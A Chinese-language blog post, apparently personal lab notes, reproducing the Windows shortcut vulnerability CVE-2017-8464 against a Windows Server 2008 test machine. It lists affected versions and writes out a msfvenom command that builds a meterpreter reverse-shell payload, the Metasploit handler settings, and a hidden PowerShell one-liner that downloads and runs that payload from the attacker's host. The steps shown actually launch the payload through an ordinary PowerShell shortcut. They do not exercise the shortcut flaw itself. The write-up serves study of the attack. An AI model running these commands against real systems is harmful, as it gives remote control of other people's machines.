闲来没事翻翻漏洞复现的进程,哎。。。这个漏洞复现还是做了吧,当作自己的笔记与大家分享一下,其实网上有许多这样的文章,本小白只是打着学习漏洞原理来进行漏洞复现。
CVE-2017-8464的漏洞:官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。这个漏洞影响的版本其实挺多的。
可以远程利用的漏洞版本:
- Microsoft Windows 10 Version 1607 for 32-bit Systems
- Microsoft Windows 10 Version 1607 for x64-based Systems
- Microsoft Windows 10 for 32-bit Systems
- Microsoft Windows 10 for x64-based Systems
- Microsoft Windows 10 version 1511 for 32-bit Systems
- Microsoft Windows 10 version 1511 for x64-based Systems
- Microsoft Windows 10 version 1703 for 32-bit Systems
- Microsoft Windows 10 version 1703 for x64-based Systems
- Microsoft Windows 7 for 32-bit Systems SP1
- Microsoft Windows 7 for x64-based Systems SP1
- Microsoft Windows 8.1 for 32-bit Systems
- Microsoft Windows 8.1 for x64-based Systems
- Microsoft Windows RT 8.1
服务器系统
- Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
- Microsoft Windows Server 2008 R2 for x64-based Systems SP1
- Microsoft Windows Server 2008 for 32-bit Systems SP2
- Microsoft Windows Server 2008 for Itanium-based Systems SP2
- Microsoft Windows Server 2008 for x64-based Systems SP2
- Microsoft Windows Server 2012
- Microsoft Windows Server 2012 R2
- Microsoft Windows Server 2016
实验环境:
攻击机:Ubuntu
IP地址:192.168.205.138
靶机: Microsoft Windows Server 2008
IP地址:192.168.205.135
注明一下:本打算使用kali2.0作为攻击机,由于出了点小状况,故使用乌班图虚机作为攻击机。
话不多说,拿起工具开始干:
首先,我们现在乌班图虚机中创建一个shell,名称为cmdback.ps1:
执行命令msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.205.138 lport=6666 -f psh-reflection>cmdback.ps1,在网站目录下生成了一个cmdback.ps1的文件:
访问乌班图中生成的shell文件:
启动msf进行设置反弹参数信息:
(1)、输入命令进入 use exploit/multi/handler
指定本机IP set LHOST 192.168.205.138
指定端口 set LPORT 6666
设置返回载荷 set payload windows/x64/meterpreter/reverse_tcp
上述工作做完之后,在靶机上面创建posershell.exe的快捷键:
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.205.138/cmdback.ps1');test.ps1"
点击下一步,生成的*.exe文件:
最后我们在攻击机上面输入exploit ,同时在靶机上面运行powershell.exe快捷键:
输入shell,成功获取目标主机的权限: